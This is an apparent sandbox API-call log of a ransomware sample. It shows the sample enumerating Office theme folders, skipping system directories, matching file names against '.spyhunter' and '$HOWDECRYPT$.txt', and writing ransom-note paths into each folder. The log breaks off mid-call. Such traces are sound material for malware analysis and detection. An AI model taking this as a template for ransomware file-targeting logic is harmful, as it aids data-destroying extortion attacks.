lstrcmpiW (lpString1="RIPPLE.INF", lpString2="Windows") returned -1 [0090.854] lstrlenW (lpString="Windows") returned 7 [0090.854] lstrcmpiW (lpString1="RIPPLE.INF", lpString2="$Recycle.bin") returned 1 [0090.855] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.855] lstrcmpiW (lpString1="RIPPLE.INF", lpString2="System Volume Information") returned -1 [0090.855] lstrlenW (lpString="System Volume Information") returned 25 [0090.855] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0090.855] StrStrIW (lpFirst="RIPPLE.INF", lpSrch=".spyhunter") returned 0x0 [0090.855] lstrcmpW (lpString1="RIPPLE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.855] lstrcmpW (lpString1="RIPPLE.INF", lpString2="_uninstalling_.png") returned 1 [0090.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0090.855] GetProcessHeap () returned 0x2c0000 [0090.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x381580 [0090.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12d0) returned 0x3824f8 [0090.855] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.855] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.855] lstrlenW (lpString="Windows") returned 7 [0090.855] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.855] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.855] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.855] lstrlenW (lpString="System Volume Information") returned 25 [0090.855] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0090.855] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.855] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.855] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0090.855] GetProcessHeap () returned 0x2c0000 [0090.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x381668 [0090.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12d8) returned 0x3824f8 [0090.856] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.856] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.856] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\$HOWDECRYPT$.txt") returned 83 [0090.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\$HOWDECRYPT$.txt") returned 83 [0090.856] GetProcessHeap () returned 0x2c0000 [0090.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x341f00 [0090.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12e0) returned 0x3824f8 [0090.856] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.856] lstrcmpiW (lpString1="RMNSQUE", lpString2="Windows") returned -1 [0090.856] lstrlenW (lpString="Windows") returned 7 [0090.856] lstrcmpiW (lpString1="RMNSQUE", lpString2="$Recycle.bin") returned 1 [0090.856] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.856] lstrcmpiW (lpString1="RMNSQUE", lpString2="System Volume Information") returned -1 [0090.856] lstrlenW (lpString="System Volume Information") returned 25 [0090.856] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned 67 [0090.856] lstrcmpW (lpString1="RMNSQUE", lpString2=".") returned 1 [0090.856] lstrcmpW (lpString1="RMNSQUE", lpString2="..") returned 1 [0090.856] GetProcessHeap () returned 0x2c0000 [0090.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.857] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*") returned 69 [0090.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.862] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.862] lstrlenW (lpString="Windows") returned 7 [0090.862] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.862] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.862] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.862] lstrlenW (lpString="System Volume Information") returned 25 [0090.862] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\.") returned 69 [0090.862] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.862] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.862] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.862] lstrlenW (lpString="Windows") returned 7 [0090.862] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.862] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.862] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.862] lstrlenW (lpString="System Volume Information") returned 25 [0090.862] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\..") returned 70 [0090.862] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.862] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.862] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.863] lstrlenW (lpString="Windows") returned 7 [0090.863] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.863] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.863] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.863] lstrlenW (lpString="System Volume Information") returned 25 [0090.863] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0090.863] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.863] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.863] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0090.863] GetProcessHeap () returned 0x2c0000 [0090.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x381750 [0090.863] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12e8) returned 0x3824f8 [0090.863] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.868] lstrcmpiW (lpString1="RMNSQUE.ELM", lpString2="Windows") returned -1 [0090.868] lstrlenW (lpString="Windows") returned 7 [0090.868] lstrcmpiW (lpString1="RMNSQUE.ELM", lpString2="$Recycle.bin") returned 1 [0090.868] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.868] lstrcmpiW (lpString1="RMNSQUE.ELM", lpString2="System Volume Information") returned -1 [0090.868] lstrlenW (lpString="System Volume Information") returned 25 [0090.868] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0090.868] StrStrIW (lpFirst="RMNSQUE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.868] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.868] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.868] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0090.868] GetProcessHeap () returned 0x2c0000 [0090.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x376948 [0090.869] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12f0) returned 0x3824f8 [0090.869] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.869] lstrcmpiW (lpString1="RMNSQUE.INF", lpString2="Windows") returned -1 [0090.869] lstrlenW (lpString="Windows") returned 7 [0090.869] lstrcmpiW (lpString1="RMNSQUE.INF", lpString2="$Recycle.bin") returned 1 [0090.869] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.869] lstrcmpiW (lpString1="RMNSQUE.INF", lpString2="System Volume Information") returned -1 [0090.869] lstrlenW (lpString="System Volume Information") returned 25 [0090.869] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0090.869] StrStrIW (lpFirst="RMNSQUE.INF", lpSrch=".spyhunter") returned 0x0 [0090.869] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.869] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="_uninstalling_.png") returned 1 [0090.869] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0090.869] GetProcessHeap () returned 0x2c0000 [0090.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x376a30 [0090.869] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x12f8) returned 0x3824f8 [0090.869] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.869] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.869] lstrlenW (lpString="Windows") returned 7 [0090.869] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.869] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.869] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.869] lstrlenW (lpString="System Volume Information") returned 25 [0090.869] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0090.869] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.869] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.869] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.870] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0090.870] GetProcessHeap () returned 0x2c0000 [0090.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x341ff0 [0090.870] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1300) returned 0x3824f8 [0090.870] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.870] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.870] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\$HOWDECRYPT$.txt") returned 84 [0090.870] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\$HOWDECRYPT$.txt") returned 84 [0090.870] GetProcessHeap () returned 0x2c0000 [0090.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3550c8 [0090.870] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1308) returned 0x3824f8 [0090.870] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.870] lstrcmpiW (lpString1="SATIN", lpString2="Windows") returned -1 [0090.870] lstrlenW (lpString="Windows") returned 7 [0090.870] lstrcmpiW (lpString1="SATIN", lpString2="$Recycle.bin") returned 1 [0090.870] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.870] lstrcmpiW (lpString1="SATIN", lpString2="System Volume Information") returned -1 [0090.870] lstrlenW (lpString="System Volume Information") returned 25 [0090.870] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned 65 [0090.870] lstrcmpW (lpString1="SATIN", lpString2=".") returned 1 [0090.870] lstrcmpW (lpString1="SATIN", lpString2="..") returned 1 [0090.870] GetProcessHeap () returned 0x2c0000 [0090.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.871] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*") returned 67 [0090.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.871] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.871] lstrlenW (lpString="Windows") returned 7 [0090.871] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.871] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.871] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.871] lstrlenW (lpString="System Volume Information") returned 25 [0090.871] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\.") returned 67 [0090.871] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.871] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.871] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.871] lstrlenW (lpString="Windows") returned 7 [0090.871] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.871] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.871] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.871] lstrlenW (lpString="System Volume Information") returned 25 [0090.871] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\..") returned 68 [0090.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.871] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.871] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.872] lstrlenW (lpString="Windows") returned 7 [0090.872] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.872] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.872] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.872] lstrlenW (lpString="System Volume Information") returned 25 [0090.872] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0090.872] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.872] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.872] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0090.872] GetProcessHeap () returned 0x2c0000 [0090.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x376b18 [0090.872] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1310) returned 0x3824f8 [0090.872] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.872] lstrcmpiW (lpString1="SATIN.ELM", lpString2="Windows") returned -1 [0090.872] lstrlenW (lpString="Windows") returned 7 [0090.872] lstrcmpiW (lpString1="SATIN.ELM", lpString2="$Recycle.bin") returned 1 [0090.872] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.872] lstrcmpiW (lpString1="SATIN.ELM", lpString2="System Volume Information") returned -1 [0090.872] lstrlenW (lpString="System Volume Information") returned 25 [0090.872] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 [0090.872] StrStrIW (lpFirst="SATIN.ELM", lpSrch=".spyhunter") returned 0x0 [0090.872] lstrcmpW (lpString1="SATIN.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.872] lstrcmpW (lpString1="SATIN.ELM", lpString2="_uninstalling_.png") returned 1 [0090.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 [0090.872] GetProcessHeap () returned 0x2c0000 [0090.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345d88 [0090.873] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1318) returned 0x3824f8 [0090.873] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.873] lstrcmpiW (lpString1="SATIN.INF", lpString2="Windows") returned -1 [0090.873] lstrlenW (lpString="Windows") returned 7 [0090.873] lstrcmpiW (lpString1="SATIN.INF", lpString2="$Recycle.bin") returned 1 [0090.873] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.873] lstrcmpiW (lpString1="SATIN.INF", lpString2="System Volume Information") returned -1 [0090.873] lstrlenW (lpString="System Volume Information") returned 25 [0090.873] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0090.873] StrStrIW (lpFirst="SATIN.INF", lpSrch=".spyhunter") returned 0x0 [0090.873] lstrcmpW (lpString1="SATIN.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.873] lstrcmpW (lpString1="SATIN.INF", lpString2="_uninstalling_.png") returned 1 [0090.873] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0090.873] GetProcessHeap () returned 0x2c0000 [0090.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345e68 [0090.873] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1320) returned 0x3824f8 [0090.873] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.873] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.873] lstrlenW (lpString="Windows") returned 7 [0090.873] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.873] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.873] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.873] lstrlenW (lpString="System Volume Information") returned 25 [0090.873] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0090.873] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.873] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.873] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0090.874] GetProcessHeap () returned 0x2c0000 [0090.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x376c00 [0090.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1328) returned 0x3824f8 [0090.874] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.874] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.874] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\$HOWDECRYPT$.txt") returned 82 [0090.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\$HOWDECRYPT$.txt") returned 82 [0090.874] GetProcessHeap () returned 0x2c0000 [0090.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x3420e0 [0090.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1330) returned 0x3824f8 [0090.874] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.875] lstrcmpiW (lpString1="SKY", lpString2="Windows") returned -1 [0090.875] lstrlenW (lpString="Windows") returned 7 [0090.875] lstrcmpiW (lpString1="SKY", lpString2="$Recycle.bin") returned 1 [0090.875] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.875] lstrcmpiW (lpString1="SKY", lpString2="System Volume Information") returned -1 [0090.875] lstrlenW (lpString="System Volume Information") returned 25 [0090.875] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned 63 [0090.875] lstrcmpW (lpString1="SKY", lpString2=".") returned 1 [0090.875] lstrcmpW (lpString1="SKY", lpString2="..") returned 1 [0090.875] GetProcessHeap () returned 0x2c0000 [0090.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.875] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*") returned 65 [0090.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.881] lstrlenW (lpString="Windows") returned 7 [0090.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.881] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.881] lstrlenW (lpString="System Volume Information") returned 25 [0090.881] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\.") returned 65 [0090.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.882] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.882] lstrlenW (lpString="Windows") returned 7 [0090.882] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.882] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.882] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.882] lstrlenW (lpString="System Volume Information") returned 25 [0090.882] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\..") returned 66 [0090.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.882] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.882] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.882] lstrlenW (lpString="Windows") returned 7 [0090.882] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.882] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.882] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.882] lstrlenW (lpString="System Volume Information") returned 25 [0090.882] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0090.882] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0090.882] GetProcessHeap () returned 0x2c0000 [0090.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345f48 [0090.883] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1338) returned 0x3824f8 [0090.883] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.883] lstrcmpiW (lpString1="SKY.ELM", lpString2="Windows") returned -1 [0090.883] lstrlenW (lpString="Windows") returned 7 [0090.883] lstrcmpiW (lpString1="SKY.ELM", lpString2="$Recycle.bin") returned 1 [0090.883] lstrlenW 